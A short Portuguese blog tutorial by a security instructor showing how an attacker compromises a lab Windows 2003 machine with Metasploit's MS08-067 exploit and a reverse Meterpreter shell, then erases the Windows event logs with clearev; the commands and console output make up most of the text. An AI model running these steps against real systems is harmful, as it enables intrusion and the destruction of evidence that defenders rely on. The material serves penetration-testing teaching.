Depois do ataque, a primeira tarefa do invasor será apagar LOGs. É claro que existem diversas maneiras de exclusão, principalmente se o sistema operacional for UNIX, pois processos não impedirão a exclusão de arquivos como no Windows, ou seja, bastará ter poder de root e nada que um toque da morte possa resolver.

A seguir, utilizarei o metasploit para exclusão de LOGs de uma máquina Windows.

1º) Primeiramente vamos comprometer o alvo

msf > use windows/smb/ms08_67_netapi
msf exploit (ms08_067_netapi) > set LHOST 192.168.42.150
LHOST => 192.168.42.150
msf exploit (ms08_067_netapi) > set RHOST 192.168.42.254
RHOST => 192.168.42.254
msf exploit (ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit (ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.42.150:4444
[*] Automatically detecting the target …
[*] Fingerprint: Windows 2003 – No Service Pack – lang:Unknown
[*] Selected Target: Windows 2003 SP0 Universal
[*] Attempting to trigger the vulnerability …
[*] Sending stage (749056 bytes) to 192.168.42.254
[*] Meterpreter session 1 opened (192.168.42.150:4444 -> 192.168.42.254:1031) at 2012-05-22 15:37:35 -0300

2º)Passo: Agora colocamos o meterpreter em ação, utilizamos o clearev:

meterpreter > clearev
[*] Wiping 200 records from Application…
[*] Wiping 300 records from System…
[*] Wiping 90 records from Security…

Ai está, simples !!! 200 registros aplicação + 300 de sistemas + 90 de segurança apagados.

E isso ai !!!!

Autor: Sílvio César Roxo Giavaroto

É MBA Especialista em Gestão de Segurança da Informação, Tecnólogo em Redes de Computadores, C|EH Certified Ethical Hacker, atua como Pentest e Analista de Segurança em Servidores Linux no Governo do Estado de São Paulo, Professor Universitário ,  Instrutor C|EH e C|HFI.

 

Comentários fechados.